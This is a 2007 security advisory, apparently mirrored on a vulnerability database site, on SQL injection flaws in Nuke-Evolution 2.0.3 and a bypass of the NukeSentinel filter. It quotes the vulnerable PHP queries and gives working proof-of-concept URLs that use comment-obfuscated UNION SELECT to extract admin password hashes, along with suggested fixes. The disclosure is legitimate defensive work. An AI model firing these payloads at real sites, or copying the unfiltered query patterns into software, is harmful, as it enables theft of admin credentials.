Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16798
HistoryApr 20, 2007 - 12:00 a.m.

NukeSentinel Bypass SQL Injection & Nuke Evolution <= 2.0.3 SQL Injections

2007-04-2000:00:00
vulners.com
44
JSON

PROGRAM: Nuke-Evolution & NukeSentinel
HOMEPAGE: http://www.nuke-evolution.com/
VERSION: All versions
BUG 1 NukeSentinel Bypass SQL Injection Protection
BUG 2 Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities
AUTHOR: Aleksandar

NukeSentinel Bypass SQL Injection Protection

nukesentinel.php Line 270-290

// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'/union/') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'/union/') OR stristr($nsnst_const['query_string_base64'],' union ')) {
// block_ip($blocker_row);
die("BLOCK IP 1 " );
}
}

// Check for CLIKE attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[2];
if($blocker_row['activate'] > 0) {
if (
stristr($nsnst_const['query_string'],'/') OR
stristr($nsnst_const['query_string_base64'],'/') OR
stristr($nsnst_const['query_string'],'/') OR
stristr($nsnst_const['query_string_base64'],'/')) {
// block_ip($blocker_row);
die("BLOCK IP 2 " );
}
}

Example(Bypass SQL Injection Protection):

PHPNuke + NukeSentinel
http://localhost/php-nuke/?&#37;2f**&#37;2fUNION&#37;2f**&#37;2fSELECT … etc

Nuke-Evolution + NukeSentinel
http://localhost/nuke-evolution/?&#37;2f**&#37;2fUNION&#37;2f**&#37;2fSELECT … etc

Nuke-Evolution Basic 2.0.3

Open source content management system, which features customizable blocks, modules, multilanguage support and themes. With importance on security, speed and usability.
A PHP-Nuke based CMS with added security, functionality, and core improvements.

Site:http://www.nuke-evolution.com/

Your_Account/index.php

Vulnerability code:

case &quot;userinfo&quot;:
    //include&#40;&quot;modules/$module_name/public/userinfo.php&quot;&#41;;

/[BEGIN]*************************************
[ Mod: YA Merge v1.0.0 ]
*****/
//The "$username" variable isn't filtered!!!
$result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'<pre><br>");
$uid = $db->sql_fetchrow($result);
Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]);
die();
/[END]
[ Mod: YA Merge v1.0.0 ]
******************************************************/
break;

POC Exploit:
http://localhost/nukeNE/modules.php?name=Your_Account&amp;op=userinfo&amp;username=1&#39;&#37;2f**&#37;2fUNION&#37;2f**&#37;2fSELECT&#37;20pwd&#37;20FROM&#37;20nuke_authors&#37;20WHERE&#37;20&#37;20radminsuper=&#39;1&#39;&#37;2f**

Results:
MOZILA FIREFOX
URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&amp;mode=viewprofile&amp;u=ADMIN-MD5-HASH

MOZILA FIREFOX
Live HTTP Headers - Firefox Add-ons

http://localhost/nukeNE/modules.php?name=Profile&amp;mode=viewprofile&amp;u=ADMIN-MD5-HASH
GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate

News/read_article.php line 66

Vulnerability code:
++++++++++++++++++++++++++++++++++
// //The "'$sid" variable isn't filtered!!!
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";
$result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

POC Exploit:
http://localhost:8080/htmlNE/modules.php?name=News&amp;file=read_article&amp;sid=-1&#39;&#37;2f**&#37;2fUNION&#37;2f**&#37;2fSELECT&#37;201,1,1,pwd,1,1,1,1,1,1,1,1,1,1&#37;20FROM&#37;20nuke_authors&#37;20WHERE&#37;20radminsuper=&#39;1&#39;&#37;2f**

FIX
++++++++++++++++++++++++++++++++++
$sid= intval($sid); // FIX
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";
$result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

Donate/index.php line 33 & 46
Vulnerability code:

    if &#40;is_numeric&#40;$uid&#41;&#41; { // LOL :&#41; 
            $uid = intval&#40;$uid&#41;;  :&#41; LOL
    }


// Line 46

    } elseif &#40;!empty&#40;$uid&#41;&#41; { 
            include_once&#40;NUKE_BASE_DIR.&#39;header.php&#39;&#41;;
            $sql = &quot;SELECT username FROM &quot;.$user_prefix.&quot;_users where user_id=&#39;$uid&#39;&quot;; // BOOM - &gt; SQL injection 
            $result = $db-&gt;sql_query&#40;$sql&#41;;
            $row = $db-&gt;sql_fetchrow&#40;$result&#41;;
            $name = $row[&#39;username&#39;];

POC Exploit:
http://localhost:8080/htmlNE/modules.php?name=Donate&amp;op=received&amp;uid=-1&#39;&#37;2f**&#37;2fUNION&#37;2f**&#37;2fSELECT&#37;20pwd&#37;20FROM&#37;20nuke_authors&#37;20WHERE&#37;20&#37;20radminsuper=&#39;1

FIX

++++++++++++++++++++++++++++++++++++++

    ///if &#40;is_numeric&#40;$uid&#41;&#41; {  REMOVE THIS LINE
            $uid = intval&#40;$uid&#41;; 
    ///} REMOVE THIS LINE

++++++++++++++++++++++++++++++++++++++

Best Regards
Aleksandar
Programmer and Web Developer

JSON